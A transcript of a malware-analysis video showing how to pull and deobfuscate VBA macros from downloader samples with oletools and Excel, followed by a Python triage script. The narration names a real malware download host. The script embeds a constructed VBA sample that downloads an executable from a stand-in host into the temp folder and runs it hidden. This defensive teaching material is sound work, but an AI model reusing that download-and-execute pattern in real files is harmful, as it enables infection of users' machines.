Hello and welcome to another analysis for Hedgehogs. I got a new microphone, but I still didn't get all of the equipment that I want to have. So for now the microphone is on my desk, and you might hear the sound of the fan, and the typing on the keyboard is very loud. Sorry for that, but I figured I would still make a video despite not having everything in place yet. Alright, and I guess the audio quality is already a bit better.

This week we will be looking at macro malware. I got three samples here, and I didn't look into them before I recorded this video, so let's be a bit surprised. I downloaded oletools, which is a great collection of tools to analyze macro malware. Here are some of the tools; they are Python scripts, so you need Python 2.7 for that. Alright, let's try this open command here. I think the most important tool is olevba, because that will extract the macros of the file if there are any. So let me just drag some file in here, that's the one starting with 988, and in order to see all of it we put it into a log file, 988.log. Now I suggest you set the language settings to Visual Basic; that will work here. Now you can see the macro of this file, and you can already see that it's doing, well, I guess downloading something here. That looks like part of an HTTP URL, and, well, I guess that's the rest of it. Yeah, that's the HTTP here, safepick.su, and then, well, not sure which character this is, and the rest of it. That's where it's downloading something from, so you might analyze the file that's downloaded this way.

Okay, let's take a look at the other samples. Okay, so python olevba and the 244 sample: "no macros found". Interesting. Well, we might take a look into this later, maybe. Okay, and the missing one is the 4AD something. Okay, that's here, and there's another macro. Now you have all of the modules in one place here, and the nice thing about this tool is that in the end you have a table with the most relevant things that it found, like suspicious things you might want to look at. And if you use --decode, you can even decode any hex strings in here, which is nice. So you might just repeat that with the --decode option. Where's the button? I don't find it. --decode, and then that's the 4AD. Yes, please replace it. Yes, reloaded, and there you see the strings now in the maybe decoded form, but it doesn't look very useful the way it is here now.

Okay, here: InternetReadFile, space, 64. So it does something; we don't know yet what it is. Okay, there's a "stop" function, and I guess it returns a string. Yeah, that's a string, and the stop function is used for these, for instance for these variables: CreateObject, stop with this. That's it, it's decoding this. So let's decode this. Alright, I want to know what these mean, so I also need all of that; that might also be some kind of key, and these are, I don't know, other values. Because this stop function takes two values, and usually one is a key and one is a string to encode or decode.

Okay, for that I like to use Excel and create a new sheet, and then you have to turn on the option for developing to add a Developer tab. So let's see where that is. Okay, Options, I guess, and Customize Ribbon; there's a Developer checkmark. Okay, and now we have a tab for Developer. That means you can create macros, so let's insert a button and View Code. Alright, now we got a code editor here, and we may use that for writing some, or decrypting some, things we found in here, for instance this. So let's copy this in here. This returns a string; don't go away with that. So let's say A2 is what the stop function returns here. I'm not sure if this works; let's just run it now. Where's the sheet? Okay, this is design mode, I think. Please just turn it off. Yeah, enough. Compile error, so there's some mismatch. Of course, I didn't set these values, which is kind of stupid. So the first one was this, the second one might be any of these, I guess, so just copy and paste them, and then there it is. That's a decoded string now: Scripting.FileSystemObject. And clicking on the button puts this into A2 of the worksheet, and you can do the same for the other strings you want to decode, which is quite nice. So let's put this into A4, and we copy this instead of the other one. I guess those are worth looking at as well, and there is a download for the file that it downloads. That's a macro malware downloader, so it will download this and then execute it. Interesting.

Now these are still missing; let's see where they are used. Also here, the stop function, of course, and here's also an open command, so I believe that's indeed the way it is. And also these functions, they tell you that there's some internet connection, and URL open. So okay, let's also check these. I just overwrite it, and this one, and there's the rest of it. I guess that's then the name for the dropped malware file, maybe in the temp folder or somewhere. We could check that; that's this one where it's used, and that's here. So GetSpecialFolder before that, and that's the constant 2, and now you might have to look it up, like that's a constant that stands maybe for temp or something similar. So you have to look up the specification of GetSpecialFolder on the internet to do that.

Yeah, so that's actually it. That's all I wanted to show you: how you can use Excel to deobfuscate some macro malware and how you can use oletools to get the contained VBA code. Alright, then there was this one here where there was no macro found. I don't know what's up with it, but I told you I didn't look into them before. Maybe there is no macro; it could be that this is a clean file, but that doesn't look clean, right? Okay, that's like the evil is staring into my eye. I don't know what that is, so why it says it can't find any macros, because it somehow is to execute that stuff. But just by seeing this you will also realize: even if you cannot extract anything from it using certain tools, it's worth opening it in the hex editor and just looking into the file, and sometimes you might find macros in there. You can clearly see that there are some, and sometimes they just might not be referenced, or something else is wrong, so the tools may be buggy; you never know. So usually you can see the code or parts of it that will kind of be, well, usually it's not that clear as it is here, but a bit weird, but still you can make sense out of it in the hex editor.

Okay, that's already everything for today. I hope the next time the audio will be even better; I'm not sure yet. Okay, thank you for watching, see you next week, I hope so. Bye bye.
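As an added example that is not part of the video, and not the olevba or Excel workflow shown in it, the following Python script does the same triage on a macro dump that the video does by hand: it finds quoted hex literals and decodes them (the `--decode` step), lists the suspicious keywords a practitioner would want flagged, and resolves `GetSpecialFolder(n)` to the documented `Scripting.FileSystemObject` constants (0 = WindowsFolder, 1 = SystemFolder, 2 = TemporaryFolder, so the constant 2 in the video is the temp folder). A last helper does the hex-editor fallback for files where the extractor reports no macros: it greps the raw bytes for VBA-related marker strings. The `SAMPLE_VBA` text, the URL inside it and the marker list are constructed for this example and are not from the video's samples.

```python
"""Triage helpers for a VBA macro dump: decode hex string literals,
flag suspicious keywords and resolve GetSpecialFolder() constants.
Constructed example; not code from the video or from oletools."""
import re
from typing import Dict, List, Tuple

# Constructed sample VBA (not one of the video's samples). The URL is stored
# as a hex string, a common way downloaders hide it, and the drop path is
# built from GetSpecialFolder(2), the TemporaryFolder constant.
SAMPLE_VBA = '''
Attribute VB_Name = "Module1"
Sub AutoOpen()
    Dim fso As Object, url As String, dst As String
    Set fso = CreateObject("Scripting.FileSystemObject")
    url = "687474703A2F2F6578616D706C652E696E76616C69642F612E657865"
    dst = fso.GetSpecialFolder(2) & "\\update.exe"
    Call InternetReadFile(url, dst)
    Shell dst, vbHide
End Sub
'''

# A quoted literal made only of hex byte pairs (at least 4 bytes long).
HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2}){4,})"')


def decode_hex_literals(vba: str) -> List[Tuple[str, str]]:
    """Return (encoded, decoded) pairs for every hex literal that decodes
    to printable ASCII; literals that do not are left out."""
    found = []
    for m in HEX_LITERAL.finditer(vba):
        raw = bytes.fromhex(m.group(1))
        if all(32 <= b < 127 for b in raw):
            found.append((m.group(1), raw.decode("ascii")))
    return found


# Keywords worth a look in any macro (assumed list; olevba has its own).
SUSPICIOUS = ("AutoOpen", "Document_Open", "CreateObject", "Shell",
              "InternetReadFile", "URLDownloadToFile", "GetSpecialFolder",
              "FileSystemObject", "Environ", "WScript")


def find_suspicious(vba: str) -> List[str]:
    """Sorted list of the SUSPICIOUS keywords present as whole words."""
    return sorted(kw for kw in SUSPICIOUS
                  if re.search(r"\b" + kw + r"\b", vba, re.IGNORECASE))


# Documented Scripting.FileSystemObject SpecialFolderConst values.
SPECIAL_FOLDERS = {0: "WindowsFolder", 1: "SystemFolder", 2: "TemporaryFolder"}
GSF_CALL = re.compile(r"GetSpecialFolder\s*\(\s*(\d+)\s*\)", re.IGNORECASE)


def resolve_special_folders(vba: str) -> List[str]:
    """Name of the folder for every GetSpecialFolder(<number>) call, in order."""
    return [SPECIAL_FOLDERS.get(int(m.group(1)), "unknown(" + m.group(1) + ")")
            for m in GSF_CALL.finditer(vba)]


# Strings that hint at VBA content when scanning raw bytes (assumed list).
VBA_MARKERS = (b"Attribute VB_", b"_VBA_PROJECT", b"ThisDocument", b"Macros")


def raw_macro_indicators(data: bytes) -> List[str]:
    """Hex-editor style fallback for a file the extractor calls macro-free.
    Heuristic only: VBA source is stored compressed in the module stream, so
    a miss here proves nothing and a hit still needs manual follow-up."""
    return [marker.decode("ascii") for marker in VBA_MARKERS if marker in data]


def triage(vba: str) -> Dict[str, object]:
    """Everything a first pass over a macro dump should surface."""
    return {
        "decoded": decode_hex_literals(vba),
        "suspicious": find_suspicious(vba),
        "special_folders": resolve_special_folders(vba),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(key, value)
    print("raw markers", raw_macro_indicators(SAMPLE_VBA.encode("ascii")))
```

Run it on the text file olevba writes out (the "988.log" style dump from the video) by reading that file into a string and passing it to `triage`; pass the original document's bytes to `raw_macro_indicators` when olevba reports no macros. The decoder only handles plain hex, not a custom routine like the "stop" function in the video, which is exactly the case where running the malware's own decoder inside Excel, as shown, is the faster route.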